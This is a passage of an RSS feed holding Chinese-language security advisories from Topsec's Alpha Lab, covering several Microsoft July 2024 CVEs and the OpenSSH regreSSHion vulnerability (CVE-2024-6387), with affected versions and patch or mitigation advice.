1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38089：Microsoft Defender for IoT权限提升漏洞</span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Microsoft Defender for IoT中的权限管理不当漏洞（CWE-269）。经过高级用户身份认证的远程攻击者通过逃离sensor-app docker容器（正在运行Web应用程序）并在主机上运行命令来利用该漏洞。成功利用此漏洞的攻击者能够获得逃离AppContainer并冒充非AppContainer令牌的能力。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-20701：SQL Server Native Client OLE DB提供程序远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是SQL Server Native Client OLE DB提供程序中的堆溢出漏洞（CWE-122）。攻击者可以通过诱骗经过身份认证的用户尝试通过连接驱动程序(例如：OLE DB或OLEDB，视情况而定)连接到恶意SQL服务器数据库来利用此漏洞。这可能导致数据库返回恶意数据，从而导致客户端上执行任意代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">本月更新中还发布了很多此组件的漏洞，请到MSRC官网查看更多漏洞的详细信息。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-28899：Secure Boot安全功能绕过漏洞</span></span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">该漏洞是Secure Boot中的栈溢出漏洞（CWE-121）。经过身份认证的局域网攻击者通过安装恶意的.wim文件来利用此漏洞。成功利用此漏洞的攻击者可以绕过安全启动。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">本月更新中还发布了很多此组件的漏洞，请到MSRC官网查看更多漏洞的详细信息。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><strong><span style="font-size: 14px;"></span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的7月补丁并安装：</span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496650">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5eb220d1&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496650%26idx%3D1%26sn%3D3178a0172b6a8b78b1442119141488c8%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 10 Jul 2024 15:15:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于OpenSSH远程代码执行漏洞(CVE-2024-6387)的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496648&amp;idx=1&amp;sn=34cf6111dc8ff2fca5fb1e2c2b2acd74</link>
      <description>近日，天融信阿尔法实验室监测到国外研究团队Qualys发布了OpenSSH的一个远程代码执行漏洞CVE-2024-6387的细节及漏洞利用代码，该漏洞被命名为“regreSSHion”。</description>
      <content:encoded><![CDATA[<p>
<span>天融信应急响应</span> <span>2024-07-02 14:10</span> <span style="display: inline-block;">北京</span>
</p>

<p>近日，天融信阿尔法实验室监测到国外研究团队Qualys发布了OpenSSH的一个远程代码执行漏洞CVE-2024-6387的细节及漏洞利用代码，该漏洞被命名为“regreSSHion”。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=c69c7ffa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFxISBaKcoOLdfvQbBErJicol6hhbuEmXUFtX4j8EiabLwAFkP3HoNl8pEIKJgRribb42YGWUSu74pRg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100012988" data-ratio="0.3304498269896194" data-s="300,640" style="" data-type="png" data-w="578" src="https://wechat2rss.xlab.app/img-proxy/?k=4fab074a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFxISBaKcoOLdfvQbBErJicoLfYHl6AUlXiabtxjH0DUrvEGc8Y3Yau9uI6iaRNDAjd2mdWoouf9Votw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">近日，天融信阿尔法实验室监测到国外研究团队Qualys发布了OpenSSH的一个远程代码执行漏洞CVE-2024-6387的细节及漏洞利用代码，该漏洞被命名为“regreSSHion”。建议受影响用户尽快做好自查和防护。</span></p><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.034em;text-indent: 0em;">OpenSSH的sshd组件存在一个信号处理条件竞争漏洞CVE-2024-6387，未经身份认证的远程攻击者能够利用此漏洞以root权限执行任意代码。该漏洞是CVE-2006-5051的回归，是在OpenSSH 8.5p1版本的一次代码变更中引入的。</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 14px;">该漏洞被证实能够在Linux系统上运行的以Glibc编译的OpenSSH上成功利用，不过利用过程复杂、成功率不高且耗时较长。漏洞发现作者表示，平均需要大于10000次尝试（大约3~4小时）才能赢得竞争条件，平均需要6~8小时才能获得远程root shell。在以非Glibc编译的OpenSSH上利用此漏洞也是可能的，但尚未证实。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 14px;">目前的漏洞利用代码仅针对在32位Linux系统上运行的OpenSSH，由于在64位Linux系统下的ASLR更强，因此在64位Linux系统上利用该漏洞的难度更大。</span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">1、OpenSSH &lt; 4.4p1。4.4p1之前的OpenSSH版本容易受到此信号处理程序竞争条件的影响，除非它们针对CVE-2006-5051和CVE-2008-4109进行了修补。</span></p><section style="line-height: 1.5em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">2、8.5p1 &lt;= OpenSSH &lt; 9.8p1。8.5p1及之后的OpenSSH版本由于意外删除了漏洞函数中的一段代码，使CVE-2006-5051漏洞被重新引入。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><strong><span style="font-size: 12pt;font-family: 宋体;">临时缓解<br/></span></strong></section></li></ul><section style="margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">如果暂时无法更新和重新编译sshd,可通过如下步骤暂时缓解该漏洞：</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">可以在配置文件/etc/ssh/sshd_config中将LoginGraceTime设置为0（永不超时）。这可以防止远程代码执行的风险，但仍然会造成sshd拒绝服务。</span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-size: 16px;font-weight: bold;"><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">升级修复</span></strong></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">目前官方已有可更新版本，建议受影响用户参考以下链接下载源码并重新编译以升级至最新版本：</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 